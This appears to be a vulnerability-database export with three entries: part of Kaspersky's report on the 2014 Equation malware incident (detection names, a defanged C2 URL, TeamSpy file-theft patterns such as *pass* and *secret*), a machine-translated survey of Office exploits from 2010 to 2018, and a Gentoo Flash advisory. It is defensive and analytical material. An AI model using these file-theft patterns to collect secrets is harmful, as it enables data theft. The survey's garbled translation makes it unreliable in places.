\"Office-2013-PPVL-x64-en-US-Oct2013.iso\". 
What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as \"kms.exe\" (a name of a popular pirated software activation tool), and \"kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions\". Kaspersky Lab products detected the malware with the verdict **Backdoor.Win32.Mokes.hvl**.\n\nAt a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL \"http://xvidmovies[.]in/dir/index.php\". Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It's important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.\n\nTo install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. **Executing the malware would not have been possible with the antivirus enabled**.\n\nAdditionally, there also may have been other malware from different downloads that we were unaware of during this time frame. 
Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:\n\nBackdoor.OSX.Getshell.k \nBackdoor.Win32.Mokes.hvl \nBackdoor.Win32.Shiz.gpmv \nBackdoor.Win32.Swrort.dbq \nDangerousObject.Multi.Chupitio.a \nExploit.Java.Agent.f \nExploit.Java.CVE-2009-3869.a \nExploit.Java.CVE-2010-0094.bb \nExploit.Java.CVE-2010-0094.e \nExploit.Java.CVE-2010-0094.q \nExploit.Java.CVE-2010-0840.gm \nExploit.Java.CVE-2010-0842.d \nExploit.Java.CVE-2010-3563.a \nExploit.Java.CVE-2011-3544.ac \nExploit.Java.CVE-2012-0507.al \nExploit.Java.CVE-2012-0507.je \nExploit.Java.CVE-2012-1723.ad \nExploit.Java.CVE-2012-4681.l \nExploit.JS.Aurora.a \nExploit.MSVisio.CVE-2011-3400.a \nExploit.Multi.CVE-2012-0754.a \nExploit.OSX.Smid.b \nExploit.SWF.CVE-2010-1297.c \nExploit.SWF.CVE-2011-0609.c \nExploit.SWF.CVE-2011-0611.ae \nExploit.SWF.CVE-2011-0611.cd \nExploit.Win32.CVE-2010-0188.a \nExploit.Win32.CVE-2010-0480.a \nExploit.Win32.CVE-2010-3653.a \nExploit.Win32.CVE-2010-3654.a \nHackTool.Win32.Agent.vhs \nHackTool.Win32.PWDump.a \nHackTool.Win32.WinCred.e \nHackTool.Win32.WinCred.i \nHackTool.Win64.Agent.b \nHackTool.Win64.WinCred.a \nHackTool.Win64.WinCred.c \nHEUR:Exploit.FreeBSD.CVE-2013-2171.a \nHEUR:Exploit.Java.CVE-2012-1723.gen \nHEUR:Exploit.Java.CVE-2013-0422.gen \nHEUR:Exploit.Java.CVE-2013-0431.gen \nHEUR:Exploit.Java.CVE-2013-2423.gen \nHEUR:Exploit.Java.Generic \nHEUR:Exploit.Script.Generic \nHEUR:HackTool.AndroidOS.Revtcp.a \nHEUR:Trojan-Downloader.Script.Generic \nHEUR:Trojan-FakeAV.Win32.Onescan.gen \nHEUR:Trojan.Java.Generic \nHEUR:Trojan.Script.Generic \nHEUR:Trojan.Win32.Generic \nHoax.Win32.ArchSMS.cbzph \nKHSE:Exploit.PDF.Generic.a \nnot-a-virus:AdWare.JS.MultiPlug.z \nnot-a-virus:AdWare.NSIS.Agent.bx \nnot-a-virus:AdWare.Win32.Agent.allm \nnot-a-virus:AdWare.Win32.AirAdInstaller.cdgd \nnot-a-virus:AdWare.Win32.AirAdInstaller.emlr \nnot-a-virus:AdWare.Win32.Amonetize.fay \nnot-a-virus:AdWare.Win32.DomaIQ.cjw 
\nnot-a-virus:AdWare.Win32.Fiseria.t \nnot-a-virus:AdWare.Win32.iBryte.jda \nnot-a-virus:AdWare.Win32.Inffinity.yas \nnot-a-virus:AdWare.Win32.MultiPlug.nbjr \nnot-a-virus:AdWare.Win32.Shopper.adw \nnot-a-virus:Downloader.NSIS.Agent.am \nnot-a-virus:Downloader.NSIS.Agent.an \nnot-a-virus:Downloader.NSIS.Agent.as \nnot-a-virus:Downloader.NSIS.Agent.go \nnot-a-virus:Downloader.NSIS.Agent.lf \nnot-a-virus:Downloader.NSIS.OutBrowse.a \nnot-a-virus:Downloader.Win32.Agent.bxib \nnot-a-virus:Monitor.Win32.Hooker.br \nnot-a-virus:Monitor.Win32.KeyLogger.xh \nnot-a-virus:PSWTool.Win32.Cain.bp \nnot-a-virus:PSWTool.Win32.Cain.bq \nnot-a-virus:PSWTool.Win32.CredDump.a \nnot-a-virus:PSWTool.Win32.FirePass.ia \nnot-a-virus:PSWTool.Win32.NetPass.amv \nnot-a-virus:PSWTool.Win32.PWDump.3 \nnot-a-virus:PSWTool.Win32.PWDump.4 \nnot-a-virus:PSWTool.Win32.PWDump.5 \nnot-a-virus:PSWTool.Win32.PWDump.ar \nnot-a-virus:PSWTool.Win32.PWDump.at \nnot-a-virus:PSWTool.Win32.PWDump.bey \nnot-a-virus:PSWTool.Win32.PWDump.bkr \nnot-a-virus:PSWTool.Win32.PWDump.bve \nnot-a-virus:PSWTool.Win32.PWDump.f \nnot-a-virus:PSWTool.Win32.PWDump.sa \nnot-a-virus:PSWTool.Win32.PWDump.yx \nnot-a-virus:RiskTool.Win32.WinCred.gen \nnot-a-virus:RiskTool.Win64.WinCred.a \nnot-a-virus:WebToolbar.JS.Condonit.a \nnot-a-virus:WebToolbar.Win32.Agent.avl \nnot-a-virus:WebToolbar.Win32.Cossder.updv \nnot-a-virus:WebToolbar.Win32.Cossder.uubg \nnot-a-virus:WebToolbar.Win32.MyWebSearch.sv \nPDM:Trojan.Win32.Badur.a \nTrojan-Banker.Win32.Agent.kan \nTrojan-Downloader.Win32.Genome.jlcv \nTrojan-Dropper.Win32.Injector.jqmj \nTrojan-Dropper.Win32.Injector.ktep \nTrojan-FakeAV.Win64.Agent.j \nTrojan-Ransom.Win32.ZedoPoo.phd \nTrojan.Java.Agent.at \nTrojan.Win32.Adond.lbgp \nTrojan.Win32.Buzus.umzt \nTrojan.Win32.Buzus.uuzf \nTrojan.Win32.Diple.fygv \nTrojan.Win32.Genome.amqoa \nTrojan.Win32.Genome.amtor \nTrojan.Win32.Genome.kpzv \nTrojan.Win32.Genome.ngd \nTrojan.Win32.Inject.euxi \nTrojan.Win32.Starter.ceg 
\nTrojan.Win32.Swisyn.aaig \nUDS:DangerousObject.Multi.Generic \nUFO:(blocked) \nVirTool.Win32.Rootkit \nVirTool.Win32.Topo.12 \nVirus.Win32.Suspic.gen \nWMUF:(blocked)\n\n## Conclusions\n\nAt this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:\n\n**Q1** - Was our software used outside of its intended functionality to pull classified information from a person's computer?\n\n**A1** - The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.\n\n**Q2** - When did this incident occur?\n\n**A2** - In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.\n\n**Q3** - Who was this person?\n\n**A3** - Because our software anonymizes certain aspects of users' information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.\n\n**Q4** - Was there actually classified information found on the system inadvertently?\n\n**A4** - What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on an Equation specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.\n\n**Q5** - If classified information was pulled back, what happened to said data after? 
Was it handled appropriately?\n\n**A5** - After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. statistics and some metadata). We cannot assess whether the data was \"handled appropriately\" (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.\n\n**Q6** \u2013 Why was the data pulled back in the first place? Is there evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n\n**A6** - The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.\n\n**Q7** - What types of files were gathered from the supposed system?\n\n**A7** - Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.\n\n**Q8** - Do we have any indication the user was subsequently \"hacked\" by Russian actors and data exfiltrated?\n\n**A8** - Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. 
We assess this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as \"Smoke Bot\" or \"Smoke Loader\") allegedly created by a Russian hacker in 2011 and made available on [Russian underground forums](<http://xaker.name/threads/22008/>) for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name \"Zhou Lou\", from Hunan, using the e-mail address \"zhoulu823@gmail.com\". We are still working on this and further details on this malware might be made available later as a separate research paper.\n\nOf course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given the system owner's potential clearance level, the user could have been a prime target of nation states. Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.\n\n**Q9** - Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n\n**A9** - Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. 
This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user's computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.\n\nIn relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.\n\n**Q10** - Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?\n\n**A10** - We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. 
However, during this sweep we discovered something interesting in relation to TeamSpy research that we published earlier (for more details we recommend checking the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string patterns based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning \"secret\" in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:\n\n * *saidumlo*\n * *secret*.*\n * *.xls\n * *.pdf\n * *.pgp\n * *pass*.*\n\nThese strings had to be located in the body of the malware dump from a sandbox processed sample. In addition, the malware analyst included another indicator to avoid false positives: a path where the malware dropper stored dropped files: ProgramData\\Adobe\\AdobeARM.\n\nOne could theorize about an intelligence operator monitoring a malware analyst's work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is possible that, for an attacker looking for anything that could show our company in a negative light, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.\n\nMany people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. 
It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.\n\n[ **Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident](<https://securelist.com/files/2017/11/Appendix_Mokes-SmokeBot_analysis.pdf>)", "modified": "2017-11-16T10:00:34", "published": "2017-11-16T10:00:34", "href": "https://securelist.com/investigation-report-for-the-september-2014-equation-malware-detection-incident-in-the-us/83210/", "id": "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "type": "securelist", "title": "Investigation Report for the September 2014 Equation malware detection incident in the US", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. 
In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. 
\nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. 
\nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. 
\nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. 
\n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:02", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", "CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers and Adobe Security Advisories and Bulletins referenced below for details. 
\n\n### Impact\n\nBy enticing a user to open a specially crafted SWF file a remote attacker could cause a Denial of Service or the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-10.3.183.10\"", "edition": 1, "modified": "2011-10-13T00:00:00", "published": "2011-10-13T00:00:00", "id": "GLSA-201110-11", "href": "https://security.gentoo.org/glsa/201110-11", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}